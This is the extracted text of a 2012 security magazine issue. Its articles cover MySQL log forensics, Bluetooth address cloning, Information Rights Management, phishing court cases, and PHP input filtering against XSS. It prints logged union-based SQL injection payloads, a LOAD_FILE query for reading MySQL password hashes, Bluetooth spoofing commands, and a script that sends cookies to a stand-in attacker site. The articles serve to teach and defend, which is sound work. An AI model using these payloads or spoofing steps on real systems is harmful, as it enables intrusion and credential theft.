Upload
clubhack
View
229
Download
0
Tags:
Embed Size (px)
DESCRIPTION
Hacking Magazine: Issue 34 – Nov2012
Citation preview
Issue34 – Nov2012 | Page-1
Issue34 – Nov2012 | Page-2
Issue34 – Nov2012 | Page-3
Issue34 – Nov2012 | Page-4
mysql>show processlist;
Logging in MySQL
Introduction This article demonstrates logging
techniques in MySQL to uncover and
analyze any mischief attempts done by
(outside or inside) user focusing on specific
areas in database.
What you will learn
In this article I am going to talk about how
logging is done in MySQL, and what all
places to look for information regarding
queries executed by all clients using MySQL
database.
Pre-requisites
The reader must have basic working
knowledge of MySQL and Operating System
to understand technical details in this
article.
Getting Started
Following are the types of logs available in
MySQL
Log Type Info Written to Log Error log Problems encountered
starting, running, or stopping mysqld
General query log
Established client connections and statements received from clients
Binary log Statements that change data (also used for replication)
Relay log Data changes received from a replication master server
Slow query log
Queries that took more than long_query_time seconds to execute
By Default, logging is not enabled in
MySQL. To enable that use command
―show processlist‖.
Note: This shows all running queries. Info
column in result shows the query which is
executed.
Figure 1: processlist Output
Issue34 – Nov2012 | Page-5
mysql> show variables;
log_output = „FILE|TABLE|BOTH‟
Now this is only showing data for current
session. If you want to see all the queries
being executed on the server then you
should log them first.
We have seen different types of logging in
MySQL, so which one to use? We will use
General Log, which will give us all the
queries executed at the server.
How to go about it?
Check logging is enabled or not
What type of logging is enabled
(FILE, TABLE, BOTH)?
If not enabled, how to enable it?
What to check?
Checking logging is enabled or not
Simply log into the MySQL prompt and
issue following command
This will list all the global variables in
MySQL. Look for general_log variable and
its value; Ideally if logging is not enabled
then its value would be ―OFF‖ and
general_log_file variable would be:
For *NIX: “/var/lib/mysql/mysql.log”
For Windows (XAMPP setup):
“C:\xampp\mysql\data\<system_name>.l
og”
What type of logging is enabled (FILE,
TABLE, BOTH)?
You can determine whether logging
is of what type by looking output of
following variable.
You can change the value of this
using following command
mysql> SET GLOBAL log_output =
„FILE‟;
Figure 2: All available variables in MySQL
Issue34 – Nov2012 | Page-6
mysql>SET GLOBAL general_log = „ON‟;
mysql> SET GLOBAL general_log_file =
„path_on_your_system‟;
mysql>SET GLOBAL slow_query_log = „ON‟;
mysql> SET GLOBAL slow_query_log_file =
„path_on_your_system‟;
If logging not enabled, how to enable it?
As logging is not enabled, let‘s enable that
first. To do that, issue the following
command.
Similarly you can set the logging for slow
query log.
Slow query logs are basically those which
took longer time to execute then specified
value in “long_query_time”
What to check?
So, we have all the required logs. What
Next?
Let‘s Analyze.
What could be wrong?
It could be attack from web, most
common being SQL Injection
What about somebody from inside?
Privilege escalation or data stealing?
In both the cases, who did it? Let‘s find
out….
Case 1:
Suppose, somebody got a weak link in the
application, and got into the system by some
SQL Injection. I don‘t have to explain what
is SQL Injection is, well I may can tell you
what someone can do with SQL Injection.
For the attacker, there can be only one entry
point, but in backend there are many things,
like web server, database server, etc.
Let‘s look at web server log (in our case its
apache logs). During normal operations ,
things would look pretty simple and straight
forward. At the glance it looks neat and
clean.
Let‘s search for something, like ―select‖, if
anyone is trying to run a SQL query
Similarly we can search for ―union‖ or any
other such SQL command to see if there is
any suspicious activity is going on.
Figure 3: Apache access log using Xpolog
Figure 4: Filtering log on "select" command
Issue34 – Nov2012 | Page-7
It is Interesting to see that we have some
requests which have SQL queries in the
request parameters. This indicates that
there is something suspicious about these
requests as timestamp is same for few
queries. It simply means attacker has run
an automated scanner to exploit the
vulnerability.
Suspicious log snippet: 127.0.0.1 - - [14/Sep/2012:15:45:10
+0530] "GET
/sqli.php?u=999999.9%27+union+all+selec
t+%28select+concat%280x7e%2C0x27%2C0x72
33646D3076335F68766A5F696E6A656374696F6
E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x3
1303235343830303536+and+%27x%27%3D%27x
HTTP/1.1" 200 54 "-" "Mozilla/4.0
(compatible; MSIE 7.0; Windows NT 5.1;
SV1; .NET CLR 2.0.50727)”
127.0.0.1 - - [14/Sep/2012:15:45:10
+0530] "GET
/sqli.php?u=999999.9%27+union+all+selec
t+concat%280x7e%2C0x27%2Cunhex%28Hex%28
cast%28database%28%29+as+char%29%29%29%
2C0x27%2C0x7e%29%2C0x313032353438303035
36+and+%27x%27%3D%27x HTTP/1.1" 200 42
"-" "Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; SV1; .NET CLR
2.0.50727)”
127.0.0.1 - - [14/Sep/2012:15:46:05
+0530] "GET
/sqli.php?u=999999.9%27+union+all+selec
t+concat%280x7e%2C0x27%2Cunhex%28Hex%28
cast%28user%28%29+as+char%29%29%29%2C0x
27%2C0x7e%29%2C0x31303235343830303536+a
nd+%27x%27%3D%27x HTTP/1.1" 200 47 "-"
"Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; SV1; .NET CLR
2.0.50727)”
127.0.0.1 - - [14/Sep/2012:15:46:05
+0530] "GET
/sqli.php?u=999999.9%27+union+all+selec
t+concat%280x7e%2C0x27%2Cunhex%28Hex%28
cast%28version%28%29+as+char%29%29%29%2
C0x27%2C0x7e%29%2C0x3130323534383030353
6+and+%27x%27%3D%27x HTTP/1.1" 200 39
"-" "Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; SV1; .NET CLR
2.0.50727)”
127.0.0.1 - - [14/Sep/2012:15:46:05
+0530] "GET
/sqli.php?u=999999.9%27+union+all+selec
t+concat%280x7e%2C0x27%2Cunhex%28Hex%28
cast%28database%28%29+as+char%29%29%29%
2C0x27%2C0x7e%29%2C0x313032353438303035
36+and+%27x%27%3D%27x HTTP/1.1" 200 42
"-" "Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; SV1; .NET CLR
2.0.50727)”
127.0.0.1 - - [14/Sep/2012:15:46:05
+0530] "GET
/sqli.php?u=999999.9%27+union+all+selec
t+concat%280x7e%2C0x27%2Cunhex%28Hex%28
cast%28system_user%28%29+as+char%29%29%
29%2C0x27%2C0x7e%29%2C0x313032353438303
03536+and+%27x%27%3D%27x HTTP/1.1" 200
47 "-" "Mozilla/4.0 (compatible; MSIE
7.0; Windows NT 5.1; SV1; .NET CLR
2.0.50727)”
127.0.0.1 - - [14/Sep/2012:15:46:05
+0530] "GET
/sqli.php?u=999999.9%27+union+all+selec
t+concat%280x7e%2C0x27%2Cunhex%28Hex%28
cast%28%40%40hostname+as+char%29%29%29%
2C0x27%2C0x7e%29%2C0x313032353438303035
36+and+%27x%27%3D%27x HTTP/1.1" 200 42
"-" "Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; SV1; .NET CLR
2.0.50727)”
127.0.0.1 - - [14/Sep/2012:15:46:05
+0530] "GET
/sqli.php?u=999999.9%27+union+all+selec
t+concat%280x7e%2C0x27%2Cunhex%28Hex%28
cast%28%40%40basedir+as+char%29%29%29%2
C0x27%2C0x7e%29%2C0x3130323534383030353
6+and+%27x%27%3D%27x HTTP/1.1" 200 47
"-" "Mozilla/4.0 (compatible; MSIE 7.0;
Windows NT 5.1; SV1; .NET CLR
2.0.50727)”
Figure 5: Filtering log on ''union" command
Issue34 – Nov2012 | Page-8
Once you are sure that there is an incident
of SQL Injection by an unknown IP then you
can proceed with the formal procedure of
investigating this issue with cyber cell.
Case 2:
Now let‘s consider the second case, where
MySQL user who has access to database has
done some mischiefs. Popular activities
possible are:
Running privileges escalation
attacks
Getting root password (will see how)
Dumping database(s) into files
Note: There are few privilege escalation
attacks available in Metasploit also.
For getting the root password is fairly
simple. A low privilege user just has to
execute following command on the prompt.
Note: The path will change as per the setup.
If you are not getting any result then you
should have physical access to this file, ssh,
RDP, etc. Basically we just need data of this
file.
This is a binary file containing the MySQL
user information with username and
password. So if you are root user then you
can simply run following query to see all
users.
When low privilege user (fdb in our case)
tries to run this query, obviously he will get
access denied error. At this instance our
previous query will be handy, reading
binary file. So, what is the problem now?
Simple, the password is stored in MD5
hash. Cracking this would not take much
time.
Note: Tools like md5crack, John the Ripper,
Cain & Adel do a fine job of cracking MD5
hashes.
Considering the last part, where user is
dumping the database into file for some
notorious purpose, we can check the same
in our general_log or slow_query_log for
such queries. In this case we are opening
this log file in and we will do some manual
analysis first.
Here is snippet of the query log:
325 Connect root@localhost on
325 Init DB forensics
325 Query SELECT * FROM
forensics_test where uname = '999999.9'
union all select (select distinct
concat(0x7e,0x27,unhex(Hex(cast(schema_
name as char))),0x27,0x7e) from
`information_schema`.schemata limit
3,1),0x31303235343830303536 and 'x'='x'
325 Quit
326 Connect root@localhost on
326 Init DB forensics
326 Query SELECT * FROM
forensics_test where uname = '999999.9'
union all select (select distinct
concat(0x7e,0x27,unhex(Hex(cast(schema_
name as char))),0x27,0x7e) from
`information_schema`.schemata limit
4,1),0x31303235343830303536 and 'x'='x'
mysql> SELECT
LOAD_FILE(„C:\xampp\mysql\data\my
sql\user.MYD‟);
mysql> select Host, User,
Password from mysql.user;
Figure 6: Users table in MySQL
Issue34 – Nov2012 | Page-9
326 Quit
327 Connect root@localhost on
327 Init DB forensics
327 Query SELECT * FROM
forensics_test where uname = '999999.9'
union all select (select distinct
concat(0x7e,0x27,unhex(Hex(cast(schema_
name as char))),0x27,0x7e) from
`information_schema`.schemata limit
5,1),0x31303235343830303536 and 'x'='x'
327 Quit
328 Connect root@localhost on
328 Init DB forensics
328 Query SELECT * FROM
forensics_test where uname = '999999.9'
union all select (select distinct
concat(0x7e,0x27,unhex(Hex(cast(schema_
name as char))),0x27,0x7e) from
`information_schema`.schemata limit
6,1),0x31303235343830303536 and 'x'='x'
328 Quit
329 Connect root@localhost on
329 Init DB forensics
329 Query SELECT * FROM
forensics_test where uname = '999999.9'
union all select (select distinct
concat(0x7e,0x27,unhex(Hex(cast(schema_
name as char))),0x27,0x7e) from
`information_schema`.schemata limit
7,1),0x31303235343830303536 and 'x'='x'
329 Quit
330 Connect root@localhost on
330 Init DB forensics
330 Query SELECT * FROM
forensics_test where uname = '999999.9'
union all select (select distinct
concat(0x7e,0x27,unhex(Hex(cast(schema_
name as char))),0x27,0x7e) from
`information_schema`.schemata limit
8,1),0x31303235343830303536 and 'x'='x'
330 Quit
What we basically search is statements like
―union select‖, query to
―information_schema‖ database, query to
―mysql‖ database, etc. Then analyze it
further to conclude on a result.
Conclusion
Only logging will not do the job, it is also
important to do analysis after that.
Frequently, database administrator(s) only
enable logging features, and leave just like
that. But the actual analysis behind it is
much more important. One thing that I
shouldn‘t be mentioning is that, using this
technique you can extract all the queries
used by an automated scanner like, Havij,
SQLMap, etc. I personally do not
recommend that, but once you know the
queries these tools run you will better
understand SQL Injection.
References:
http://dev.mysql.com/doc/refman/5.1/en/s
erver-logs.html
DhirajRanka [email protected]
DhirajRanka is currently working as
Senior Security Analyst at NII
Consulting, Mumbai for more than four
years. He is additionally involved in
intensive research and Web-based
applications testing, intended primarily
for executing vulnerability assessment
projects and delivering trainings.
Issue34 – Nov2012 | Page-10
Cloning Bluetooth Device
[Note: This demonstration is based on
article ―Bluetooth Reconnaissance –
Watching over Invisible‖. Please go through
it before moving forward]
Well in the previous section we saw that
how to find the devices which are in visible
as well as in invisible mode using different
tools. And also understood the different
terms we get while scanning process.
Here we will recall one scan information.
So here in first block the Bluetooth
addresses given then the clock offset and
then class information. By looking at class
information we can conclude which of
device we have scanned.
In this section let‘s play with our own
Bluetooth interfaces, so that we can prepare
them for attack.
Initial State:
The above screenshot is of my hci1 external
Bluetooth dongle‘s initial configuration.
Specially look at BD_ADDR, Name and
Class.
Basic and most important, first we will
change BD_ADDR of device.
#bdaddr -i hci1 <new_bd_addr>
Issue34 – Nov2012 | Page-11
As like hci1, we can change address of all of
Bluetooth devices as want –
In above screenshot, you can see that both
hci0 and hci1 device‘s BD_ADDR is
changed.
hci0 to AA:AA:AA:AA:AA:AA
hci1 to BB:BB:BB:BB:BB:BB
Now effectively rather than changing
address to all A‘s or all B‘s, we can clone our
device to any other Bluetooth devices.
First scan the air:-
#hcitool scan
Why not to pick up android BD_ADDR?
#bdaddr -i hci1 <BD_ADDR>
You can cross-check the configuration by-
#hciconfig–a
So now we successfully changed the
BD_ADDR. Interesting note is once
BD_ADDR is changed, it will remain
forever.
Now let‘s change our device name -
#hciconfig hci1 name “android”
You can cross-check again and verify that
name is also changed.
Issue34 – Nov2012 | Page-12
So now, does our Bluetooth device will act
as phone? The answer is no. You can
observe the class field. It is still 0x000000.
Let‘s change its services too…
#hciconfig hci1 class 0x58020c
Now you can clearly see that we changed the
BD_ADDR, name and also class of our
device as per our wish.
You can clearly see with these settings,
when scan is made through smartphone,bt-
0 which is default Bluetooth interface for
which we didn‘t make any changes. And
name android is nothing but hci1 dongle,
which we converted into android
smartphone.
The question is why to do these
changes?
Basically in certain premises if any
particular Bluetooth type device is blocked
or not allowed, we can simply move to any
other device with just few commands. The
above setting also plays very important role
in many attacks which we will look further.
Issue34 – Nov2012 | Page-13
Again the question is while doing
these configuration changes how to
find that on which class to move?
URL: http://bluetooth-
pentest.narod.ru/software/bluetooth_class
_of_device-service_generator.html
Find class of any device you wants to pick
up.
As per your need, you can pick up any type
of device with the services you want as
shown above.
References:
1. http://en.wikipedia.org/wiki/Bluetooth
2. http://www.bluetooth.com
3. http://linux.die.net/man/8/hciconfig
Swaroop D. YermalkaR
Swaroop is a final year engineering
student from M.I.T.CollegeOf
Engineering, Pune. He is enthusiastic
and hobbyist for Infosec.
Issue34 – Nov2012 | Page-14
Information Rights Management (IRM)
Information Rights Management is the set
of techniques and methods which protect
the highly sensitive information of the
organization irrespective of the file location
whether it resides "in" or "outside" the
corporate boundaries. This happens as the
permissions embedded inside the file don't
allow unauthorized access, modification,
copying or printing. This is typically done
for protection of financial documents,
intellectual property such as patents, design
blueprints and executive communications.
IRM broadly speaking addresses the
fundamental problem associated with Data
Protection Leakage (DLP). DLP heavily
relies on protection of sensitive file within
the corporate network typically at its end
points. It protects the data based on its
location (directory, file server/ database) or
in data in transit, but doesn't give the
protection at a more granular level, i.e.
information contained in file itself. IRM
currently applies mainly to documents and
emails in typical corporate environment
setting.
While DLP is ―transmission control‖
technology, IRM is ―usage control‖
technology.
Why do we need IRM?
The rationale for using IRM is that the
privacy information associated with data
must travel along with it. The copying of
that data must not lose the associated rights
to that information. Rights to modify,
update, restrict or even destroy that
information must be retained by the
individual it pertains to, even when a 3rd
party holds that information.
In larger context, IRM helps organizations
in enforcing corporate policy governing the
secure flow of highly sensitive data in the
organization. File protections are defined
and enforced based on user's identity along
with corporate policy on a given class of
data. The best way to protect information is
to do it directly at the level of the
information – and not at the level of many
system(s) which might change, transport or
store the information.
What exactly can be achieved with
IRM?
Preventing restricted content from
unauthorized modification, copying,
printing or pasting
Disabling Print Screen feature in
Microsoft Windows for taking
snapshots of restricted content.
Issue34 – Nov2012 | Page-15
Restricting content exposure
wherever it is sent
Support file expiration so that
contents in documents are rendered
un-viewable (or viewable)
automatically after a set time.
Full auditing of both access to
documents as well as changes to the
rights/policy by business users.
What can't be prevented using
IRM?
Sensitive Content from being erased,
stolen, captured or transmitted by
malicious programs like Trojans, key
loggers etc.
Content from being lost or corrupted
due to virus infection
Restricted content from being hand-
copied or retyped from a display
screen.
Taking digital photograph of the
restricted content displayed on a
screen by unauthorized person
Snapshots of restricted content are
possible using 3rd party screen-
capture tools.
Are Digital Rights Management
(DRM) and IRM same things?
Not Really. Digital Rights management
(DRM) technologies are typically used by
hardware manufacturers, publishers,
copyright holders and individuals with the
intent to limit the use of digital content and
devices "after sale". It is specifically targeted
to defeat any attempts for rich media piracy
like Blu-ray, CD, DVD's, tapes, records. In
United States, a legal mandate called Digital
Millennium Copyright Act (DMCA) exists
which imposes criminal penalties on those
who make available technologies whose
primary agenda is to bypass content
protection technologies.
Main focus of DRM is to defeat copyright
infringement by putting "digital locks" to
rich media eg. records, CD, DVD's etc in
business to customer domain, while IRM
restricts itself to sensitive information
exchange in business to business domain
such as merger-acquisition plans, design
blueprints, patents, financial statements,
strategic business plans etc.
Key for IRM’s successful
implementation
The strength of IRM is typically reserved for
very sensitive information that travels
outside organization — to vendors,
suppliers, outsourced parties, partners etc.
But challenges for proper authentication are
quite complex outside the enterprise. Here,
three approaches must be used for effective
implantation of IRM enterprise based
solutions:
Automating policy assignment
More automated is policy assignment, better
is IRM implementation. This happens as
automation eliminates human errors
resident in manual processes which in turn
make it more effective. They can
automatically protect documents such as
price lists, product specifications, and
manufacturing process description. This
works effectively because if we let document
authors be the sole arbiter of what to
protect, it puts an unwelcome burden on
Issue34 – Nov2012 | Page-16
them. They may neglect to do it correctly,
consistently, or at all.
Organizations can automatically assign
policies to entire information groups such as
anything saved to a certain folder, content
of a certain type, or information that has
reached a particular stage in a workflow.
This saves time, ensures consistency, and is
the most efficient way to manage large
volumes of sensitive information with IRM.
Dynamic policy control
As business conditions evolve, IRM policies
that govern the use of content must evolve
as well. Regulatory changes will almost
always require modifications to information
policies such as patent expirations, litigation
settlements, mergers and acquisitions etc.
Dynamic policy control enables recipient
entitlements to be changed when individual
roles or business needs change, regardless
of where the content resides—even when its
location is unknown. Policies reside on a
policy server, not within the content. So
they can be changed or revoked at any time.
Rights can also be set to automatically
expire.
Discretionary policy application
In the enterprise, discretionary use of IRM
is an option that should be used in addition
to rather instead of automated policy
application.
Audit Trail
An audit trail is an unalterable,
chronological log of access to a system and a
record of additions, changes, and deletions
to information that system manages, which
lists the person accessing the system, and
the time of access, and the action taken.
Steps before Implementing IRM
So you are all rolled up to implement IRM
solution in your company. But before that,
answer this quick checklist:
Outline business areas where
sensitive information is frequently
exchanged?
What needs to be protected
(documents, email etc.)
How will security policies be
enforced to protect this sensitive
information or communication?
Who can use the information
(people, group)
What a user can do with that
information (read, write, print or
forward)
When can the user access the
information (time duration and
dates)
Where can the information be
accessed from (in office, home,)
What would be the consequences to
the business if this information
ended up in the wrong hands?
Does the organization retain any
employee, customer, or member
information that could be used in
identity theft if it were exposed,
either through loss or theft?
Popular IRM Vendor List
Seclore File Secure
Microsoft Integrated Rights
Management
Boole Server
Smart Cipher
EMC IRM Product Suite
Issue34 – Nov2012 | Page-17
Challenges in IRM implementation
Lack of commitment by senior
management
The biggest roadblock in IRM
successful implementation is the
inadequate commitment shown by
senior management. Management
has to be convinced and made aware
the value of information in the
business. Consequences of losing
sensitive information must be
highlighted such as unwanted loss in
brand image and reputation, losing
client and stakeholder confidence.
Unpleasant lawsuits may proceed if
the leakage of sensitive information
is made public.
Common mistake made by senior
managers during implementation is
that they delegate the entire part of
IRM implementation to the IT team
and not take much responsibility for
it. It is important to note that IRM
must be top driven from senior
management which only can bring
about a cultural change in the
organization. Without their support,
implementation at the best stays
patchy and disorganized.
User Unwillingness to change
IRM‘s restrictive nature and
perceived usage hassles may at first
not easily gel with users. Users must
be made to undergo a mandatory
training and awareness workshop to
help ease through this process.
Suggested methodology can be
summarized as:
Methodology for managers to inducing
change in users
Unfreezing: This step alters the
forces on individuals sufficiently
such that they are distracted to opt
for a change. It reduces the user
resistance due to increased peer
pressure to induce them to go for a
change.
Moving: This step presents direction
of the change and the actual practice
of learning new attitudes.
Refreezing: The final step forges the
changed attitudes and learned skills
in users.
A good practice will be to train some
of the people in the organization and
nurture them as champions in usage
of IRM. It will be better if at least
one person from every department is
included as a part of the IRM
implementation task force. This task
force will work in close cooperation
with vendors/security team during
implementation process.
After the official implementation is
over, these champions will provide
the first point of reference and
support for any issues arising in DLP
to new users. Hence, user
satisfaction increases and
consequently resistance to adopt
new technology is lowered down.
Miscellaneous Factors
External User Authentication for
partners, vendors, suppliers,
outsourced parties, must be strong
enough and well formed. Any loose
ends will damage the confidentiality
of the information.
Issue34 – Nov2012 | Page-18
Most IRM's like Microsoft‘s
Windows Rights Management
Services are great for Windows and
Office. But they are mainly for
Microsoft apps. For apps like in CAD
or blueprints, other solutions are
either from small vendors or very
limited in scope.
References:
1. http://www.iotap.com/Blog/tabid/6
73/entryid/61/Information-Rights-
Management-Sharepoint-2010.aspx
2. http://en.wikipedia.org/wiki/Infor
mation_Rights_Management
3. http://blogs.kuppingercole.com/kup
pinger/category/information-rights-
management/
4. http://covertix.blogspot.in/
5. http://www.rcpbuyersguide.com/dl
oad.php?file=whitepapers/SponsorI
ndex_EMC_Whitepaper11534369.p
df
6. http://www.niiconsulting.com/solut
ions/information_rights_manageme
nt.html
Manas Deep [email protected]
Manasdeep currently serves as a
Security Analyst in the Technical
Assessment team at NII Consulting,
Mumbai. His work focuses on
conducting Security Audits,
Vulnerability Assessment and
Penetration Testing for NII‘s premier
clients.
He possesses strong analytical skills and
likes to keep himself involved in learning
new attack vectors, tools and
technologies. He has flair in technical
writing and shares his thoughts on his
blog ―Experiencing Computing…‖
at http://manasdeeps.blogspot.in. He
has also published information security
paper(s) in International Journal of
Computer Science and Information
Security (IJCSIS) along with various
seminar / conference proceedings.
Issue34 – Nov2012 | Page-19
Landmark Cases Decided by the Adjucation Office U/Chapt. IX of the IT Act
(I) Shri.Thomas Raju Vs. The
Branch Manager, ICICI Bank, Anna
Nagar Branch, Chennai
Case decided by – the Adjudicating officer,
Government of Tamilnadu.
Civil Jurisdiction.
Petition No. 3 of 2011
Dated– 16th May, 2011
Petitioner, an employee of a Chennai based
IT company, suffered a loss of Rs. 1,
62,800/- as a result of the phishing attack.
The said amount was supposed to have been
transferred on the account of another
customer of ICICI Bank.
Petitioner claimed that he had suffered a
wrongful loss due to unauthorised access to
his savings account at the Anna Nagar
branch of ICICI Bank.
Petitioner further claimed that he had
suffered a loss as bank has failed to
establish a due diligence and in providing
adequate checks and safeguards to prevent
unauthorised access into his account. Bank
had also not adhered to the KYC norms
given by the RBI.
The Adjudicating officer directed the ICICI
bank to pay damages to the Petitioner under
Section 43 of the IT Act.
Following cases are decided on the
same subject matter by the same
authority –
(Note: - Only citations are provided below,
full judgments can be downloaded from
http://www.tn.gov.in/departments/it.html)
I) S. UmashankarVs. ICICI Bank
Case decided by – the Adjudicating officer,
Government of Tamilnadu.
Civil Jurisdiction
Petition No. 2462 of 2008
Dated – 12th April, 2010
Issue34 – Nov2012 | Page-20
II) K.J. JeevakaArasuVs. ICICI Bank
Case decided by – the Adjudicating officer,
Government of Tamilnadu.
Civil Jurisdiction
Petition No. 1/e-gov. I/2011
Dated – 6th April, 2011
SagarRahurkar
SagarRahurkar is Masters of Law, a
Certified Fraud Examiner (CFE) and
Certified Cyber Crime Investigator. He
specializes in Cyber Laws, Fraud
examination, and Intellectual Property
Law related issues. He has co-authored a
book titled ―Introduction to Cyber
Crimes and Cyber Law‖.
Currently he works with Mahindra
Special Services Group in Fraud Risk
Management.
Issue34 – Nov2012 | Page-21
Automatic Request Filter in PHP
Filtering plays a very important role when
you are thinking about securing your
application against malicious attacks.
Security is a very important aspect while
developing a web application. There are
several kinds of attacks that could be used to
break into your web application. Based on
the kind of attack the results that hacker
gets also varies. Suppose you have SQL
injection vulnerability in your application
using SQL injection vulnerability an
attacker can do lots of things, simplest being
getting information related to users
registered in your web application. And
when a hacker has information about your
user he can do a lot of things. However we
are not going to discuss it in detail. Filtering
does not allow you to fully secure your web
application but it does increase some level
of security in your web application. The
simplest attack that you can stop by doing
request filtering is XSS.I will be giving you a
step by step guide on how you can stop XSS
on your web application using different
techniques.
In this article we will try to solve some of the
questions related to filtering:-
What is Filtering?
Why is it required?
How can we do Request filtering in
PHP?
Why do we need to automate it?
How can we automate it in PHP?
This is most helpful to someone who
is seeking a quick reference to request
filtering in PHP.
What is Filtering?
Filtering in general terms can be described
as removing unwanted contents from input
,validating input data against some format
or converting your input data in some
format so that your application does not
behave in unwanted manner.
There are two main types of filtering one is
validation and other is sanitization.
Validation is to check if the data that
is being filtered meets certain
criteria. For example we can validate
whether an email id is valid as it
needs to follow a proper pattern.
Sanitization is to either remove or
encode special characters which may
not be desired in a certain string.
Example of sanitization may be that
we encode <script> into
%3Cscript%3E. Why do we need to
do this will be explained in the next
section.
Issue34 – Nov2012 | Page-22
Why is Filtering Required?
Let‘s understand the importance of filtering
by a scenario:-
Suppose you have a web application in
which you have a Feedback section. A user
need not be a member of website and he can
post the feedback. Only the admin can view
the feedbacks. Now if proper validation has
not been done and user is able to post
malicious JavaScript also then there can be
a problem. How it can be a problem lets
understand it.
Suppose your application has some url like:
www.mysite.com/feedback.php
A hacker has created an application which is
used to store the cookies he has stolen. Now
if proper validation is not done and if your
application is vulnerable to XSS he can steal
your credentials by some JavaScript similar
to this.
<script
language=”javascript”>document.l
ocaltion=”http://hackerSite.xyz/
stealcookie.php?cookie=”+documen
t.cookie</script>
If your admin clicks on this he would be
redirected to hackers application where
credentials may be stored using the cookies.
Now what can he do with admin credentials
depends on your application but surely he is
able to break into your web application
which in any case should not happen.
Consider a comment page is there which can
be viewed by everyone and person post
similar link and users happen to click on it
which will lead to their accounts being
compromised. Now if user accounts are
compromised it will lead to a serious
problem. You might be storing some
sensitive information about user which if
goes into wrong hands may create some
serious trouble for user and You.
In the next section we will be looking
forward to figure out that how can we
implement filtering in PHP.
How can we do Request filtering in
PHP?
To do request filtering you should be able to
first catch the request and then filter the
data in each request attribute. I will be
explaining how to capture all the requests in
PHP and will be explaining two ways of
filtering the Request attributes.
Let us first understand how we can capture
all the request attributes.
PHP has three key –value based arrays for
handling request $_GET, $_POST and
$_REQUEST.
$_GET is used to capture all the attributes
sent by GET method.
$_POST is used to capture all the attributes
sent by POST method.
$_REQUEST is combination of $_GET and
$_POST. However I would suggest you not
to totally depend on $_REQUEST as you
might not be able to get all attributes in
$_REQUEST due to some server
configurations.
Now to handle all this there is small piece of
code.
I have written a code for handling all GET
attributes in a request similar approach
should be used for $_POST and
$_REQUEST.
Issue34 – Nov2012 | Page-23
if (! empty ($_GET))
{
foreach ($_GET as $key =>
$value) {
//Filtering code to be put here
}
}
Just change the name to $_POST and
$_REQUEST in foreach to implement it for
other two.
Now we will look forward to how can we do
the filtering with two approaches
1) Using htmlentities- htmlentities is a
build in function in PHP it encoded HTML
to htmlentities so < is converted to ―<‖
Now when you do this the browser will
represent it as < but it will prevent browser
from using it as HTML and so JavaScript
will not be executed.
Here is the code for implementing
htmlentities-
$_GET [$key] = htmlentities
($value)
Just put this code inside foreach loop.
2) Using Filters in PHP-Filters is a very
useful extension in PHP and you should use
it in order to provide better security to your
code. There are mainly two types of filters in
PHP.
Validate Filters-This set of filters
is used to validate or check if data
meets certain pattern or
qualification. An example can be to
validate whether user has entered a
valid email. So an email has some
pattern like [email protected] or in
etc. You can think it to validate it by
writing your own algorithm or use
filter functions in PHP. Like for
email you have
FILTER_VALIDATE_EMAIL
function. For more info on Filters
please follow
http://php.net/manual/en/book.filt
er.php.
Sanitize Filters-Sanitization filters
sanitize data by either encoding data
or removing special characters.
There are many Sanitization filters
and you can use them as per your
requirement.
For filtering data for stopping XSS we will
be using FILTER_SANITIZE_ENCODED.
Just try out this function and you will see
the results and differences. This will help
you in blocking XSS attack.
Now here is the code for implementing this
filter. $_GET [$key] =filter_var
($value,
FILTER_SANITIZE_ENCODED);
Just put this code inside foreach loop.
Why do we need to automate it?
Now you might be thinking that we can
write these code in a single file and include
it in each script using <?phprequire_once
?> type of functions. This approach seems
good but consider a case when you have
already worked on your web application and
web application might be containing scripts
raging from few hundreds, to as large as
thousands. In this case adding the script on
every page will be a tedious job and you may
miss some pages. So what can we do? The
answer is to automate the prepending of
script. So how can we do the automation of
prepending of script will be explained in
next section.
Issue34 – Nov2012 | Page-24
How can we automate it in PHP?
I will be explaining the two approaches for
automating this in PHP. The following two
approaches can be used for many things
apart from filtering.
1) Using php.ini – As a developer of PHP
you should know about php.ini file. php.ini
file is a configuration file which is used by
Apache Server to load configuration settings
for your PHP. Common examples that you
might hear will be setting maximum upload
limit, maximum time to execute a script,
register global variables etc. But we are
more interested in knowing how can we
force a script to prepend on every script that
web-application has without touching the
code. So to do this you need to open your
php.ini file in a text editor and search for
auto_prepend_file. Here is a screenshot:-
You can append as well prepend a script.
Here we need to prepend the script.
Put absolute path of your filter script
inside the quotes that you would have
created using the methods explained
above.
Now in order to apply these settings
you need to restart your server
because apache server looks into
php.ini file whenever it starts for
loading PHP configuration.
Now question is where we should do
configuration like this. Now your server
might be having many web applications so
whenever you want that your script should
be implemented on all scripts on all web
applications hosted on server you should go
for php.ini settings however when you want
settings to be applied for particular web
application below is the approach.
2) Using .htaccess- .htaccess is a
configuration file used by Apache web
servers to configure web applications on
directory bases. Search for .htaccess file
inside your web application if it is not
available create one .htaccess file. Whenever
a document is called ‗.htaccess‘ file also
needs to be loaded. Thus it may affect your
performance.
To implement add following code to
.htaccess file.
php_valueauto_prepend_file ""
Put absolute or relative path of your filter
file inside double quotes.
In this case you don‘t need to restart your
server.
‗.htaccess‘ file can be used for doing a lot of
things.
So this is how you can automate request
filtering in PHP. We have created a simple
filter for stopping XSS however you can
create your custom filter using the same
approach as per your requirement.
ParasVij [email protected]
Issue34 – Nov2012 | Page-25